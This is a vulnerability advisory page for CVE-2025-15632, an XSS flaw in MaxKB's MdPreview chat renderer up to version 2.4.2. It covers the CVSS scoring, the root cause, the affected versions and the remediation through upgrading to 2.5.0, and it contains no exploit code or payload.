CVE-2025-15632

MEDIUM
2026-04-13 VulDB
5.1
CVSS 4.0
Share

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

3
Analysis Generated
Apr 13, 2026 - 10:30 vuln.today
Severity Changed
Apr 13, 2026 - 10:22 NVD
LOW MEDIUM
CVSS Changed
Apr 13, 2026 - 10:22 NVD
3.5 (LOW) 5.1 (MEDIUM)

Tags

XSS Maxkb

Description

A vulnerability has been found in 1Panel-dev MaxKB up to 2.4.2. Impacted is an unknown function of the file ui/src/chat.ts of the component MdPreview. Such manipulation leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.5.0 is recommended to address this issue. The name of the patch is 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.

Analysis

Cross-site scripting (XSS) in 1Panel-dev MaxKB up to version 2.4.2 allows authenticated remote attackers to inject malicious scripts via the MdPreview component in ui/src/chat.ts, requiring user interaction to execute. Publicly available exploit code exists for this vulnerability. The vendor released patched version 2.5.0 addressing the flaw with commit 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8.

Technical Context

The vulnerability exists in the MdPreview component within the chat.ts file of MaxKB's TypeScript-based UI layer. MdPreview is a markdown preview renderer that processes user input; improper input sanitization allows attackers to inject arbitrary HTML and JavaScript into the rendered output. The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), a classic XSS flaw where untrusted data from chat messages flows directly into the DOM without adequate encoding or Content Security Policy protections. The affected CPE (cpe:2.3:a:1panel-dev:maxkb:*:*:*:*:*:*:*:*) covers all versions up to 2.4.2.

Affected Products

1Panel-dev MaxKB versions up to and including 2.4.2 are affected. The fix is available in version 2.5.0 and later. Users can reference the vendor's GitHub repository and releases page at https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0 for patch delivery.

Remediation

Upgrade MaxKB to version 2.5.0 or later, which includes the fix via commit 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. For detailed upgrade instructions, consult the official MaxKB releases page at https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0. In environments where immediate upgrade is not possible, restrict access to the chat functionality to trusted users only and monitor browser console logs for injected script errors as a temporary detection measure. Implement Content Security Policy (CSP) headers to mitigate the impact of any injected scripts.

Priority Score

46
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +26
POC: +20

Share

CVE-2025-15632 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy